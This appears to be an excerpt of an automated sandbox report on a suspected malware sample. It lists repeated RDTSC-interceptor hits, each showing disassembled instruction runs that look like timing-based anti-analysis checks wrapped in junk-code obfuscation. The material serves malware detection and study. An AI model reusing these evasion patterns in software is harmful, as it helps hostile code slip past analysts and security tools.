Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF2334 second address: DF23AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FF1148823CEh 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D1FD1h], edi 0x00000014 push dword ptr fs:[00000000h] 0x0000001b jl 00007FF1148823CCh 0x00000021 mov ebx, dword ptr [ebp+122D187Fh] 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e sub dword ptr [ebp+12482A06h], ecx 0x00000034 mov eax, dword ptr [ebp+122D0C45h] 0x0000003a push 00000000h 0x0000003c push edi 0x0000003d call 00007FF1148823C8h 0x00000042 pop edi 0x00000043 mov dword ptr [esp+04h], edi 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edi 0x00000050 push edi 0x00000051 ret 0x00000052 pop edi 0x00000053 ret 0x00000054 push FFFFFFFFh 0x00000056 mov edi, dword ptr [ebp+122D1ABDh] 0x0000005c mov ebx, 49EB5141h 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 push ebx 0x00000068 pop ebx 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF141D second address: DF1421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF23AD second address: DF23BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF1421 second address: DF14C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF114F02989h 0x0000000e nop 0x0000000f jmp 00007FF114F02983h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b mov dword ptr [ebp+122D198Eh], esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 jmp 00007FF114F0297Dh 0x0000002d mov edi, dword ptr [ebp+122D2BEEh] 0x00000033 mov eax, dword ptr [ebp+122D0BCDh] 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FF114F02978h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 push FFFFFFFFh 0x00000055 call 00007FF114F02984h 0x0000005a pop edi 0x0000005b nop 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF14C0 second address: DF14C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF14C5 second address: DF14EC instructions: 0x00000000 rdtsc 0x00000002 js 00007FF114F0298Dh 0x00000008 jmp 00007FF114F02987h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF5227 second address: DF5231 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF1148823CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF14EC second address: DF14F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF5231 second address: DF52B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add ebx, dword ptr [ebp+122D1D79h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FF1148823C8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 and edi, 76BD7D17h 0x0000003d mov eax, dword ptr [ebp+122D10B1h] 0x00000043 mov dword ptr [ebp+122D3015h], esi 0x00000049 push FFFFFFFFh 0x0000004b jnl 00007FF1148823D9h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FF1148823D8h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF14F0 second address: DF14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF6FE4 second address: DF6FEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF52B2 second address: DF52B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF6FEA second address: DF6FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF1148823C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF7ECA second address: DF7F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF114F02978h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov ebx, 0896E826h 0x00000028 sub dword ptr [ebp+122D2BA6h], esi 0x0000002e push 00000000h 0x00000030 mov ebx, edx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+1245C5AAh], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e jmp 00007FF114F02989h 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF7F28 second address: DF7F51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FF1148823D3h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF7F51 second address: DF7F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF8E98 second address: DF8EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jp 00007FF1148823C6h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FF1148823C6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF8EB0 second address: DF8EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFA03D second address: DFA09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D6h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF1148823C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push eax 0x00000028 mov dword ptr [ebp+122D1833h], ecx 0x0000002e pop ebx 0x0000002f mov edi, ecx 0x00000031 push 00000000h 0x00000033 xor dword ptr [ebp+122D2767h], edi 0x00000039 push 00000000h 0x0000003b sub ebx, dword ptr [ebp+122D1C63h] 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFA09D second address: DFA0BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FF114F02976h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFA0BC second address: DFA0D2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FF1148823CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFA0D2 second address: DFA0D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF80E9 second address: DF80F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF1148823C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF80F7 second address: DF810C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF9084 second address: DF9089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF9089 second address: DF908F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF908F second address: DF9093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF722C second address: DF7230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC1D0 second address: DFC1DD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF1148823C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC1DD second address: DFC1F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c js 00007FF114F02976h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC1F0 second address: DFC1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF1148823C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC1FA second address: DFC24A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FF114F02978h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 and bl, 0000001Eh 0x00000026 push 00000000h 0x00000028 mov bh, ah 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D3744h] 0x00000032 push eax 0x00000033 pushad 0x00000034 jmp 00007FF114F0297Dh 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC24A second address: DFC24E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFC456 second address: DFC477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF114F02982h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFD3A1 second address: DFD3A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFD3A6 second address: DFD3C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FF114F02983h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFF831 second address: DFF836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DFE3DF second address: DFE478 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sbb edi, 017382B1h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FF114F02978h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 or di, E26Ah 0x00000037 add dword ptr [ebp+122D1C0Fh], edx 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov bx, ax 0x00000047 mov eax, dword ptr [ebp+122D0399h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FF114F02978h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000018h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 cmc 0x00000068 ja 00007FF114F0297Ch 0x0000006e mov edi, dword ptr [ebp+122D38BCh] 0x00000074 push FFFFFFFFh 0x00000076 movsx ebx, di 0x00000079 push eax 0x0000007a jnp 00007FF114F0298Fh 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E04A09 second address: E04A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E04A0D second address: E04A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF114F02976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9673D second address: D96761 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823CBh 0x00000008 jmp 00007FF1148823D4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D96761 second address: D96780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FF114F02976h 0x0000000d jmp 00007FF114F02982h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D99E82 second address: D99E8C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF1148823C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E07BF0 second address: E07BF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E07EB8 second address: E07ED5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF1148823D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E07ED5 second address: E07EDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E0A63F second address: E0A651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1148823CCh 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E0A651 second address: E0A655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E0EC2B second address: E0EC3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E0EC3B second address: E0EC7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF114F02985h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FF114F02982h 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF114F0297Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA8FA5 second address: DA8FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF1148823CFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA8FBF second address: DA8FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF114F0297Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E136DE second address: E13702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823CDh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FF1148823CDh 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA8F5F second address: DA8F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA8F63 second address: DA8FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D4h 0x00000007 jmp 00007FF1148823D4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007FF1148823D2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13C8D second address: E13CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02985h 0x00000007 jmp 00007FF114F0297Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13CB8 second address: E13CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13CBE second address: E13CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13CC7 second address: E13CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13E35 second address: E13E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jbe 00007FF114F02978h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13F80 second address: E13F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13F86 second address: E13F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF114F0297Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13F98 second address: E13FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF1148823C6h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E13FA5 second address: E13FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E143ED second address: E14407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E14407 second address: E1440B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E146A8 second address: E146AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18FDA second address: E18FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18FE0 second address: E18FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18FE4 second address: E18FFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF114F02976h 0x00000008 jns 00007FF114F02976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18FFA second address: E18FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18FFE second address: E19022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FF114F02986h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E19022 second address: E1904D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF1148823CEh 0x00000008 js 00007FF1148823C6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 js 00007FF1148823DFh 0x00000016 jmp 00007FF1148823D3h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E192C6 second address: E192CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E192CA second address: E192DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a js 00007FF1148823C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E192DA second address: E192E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
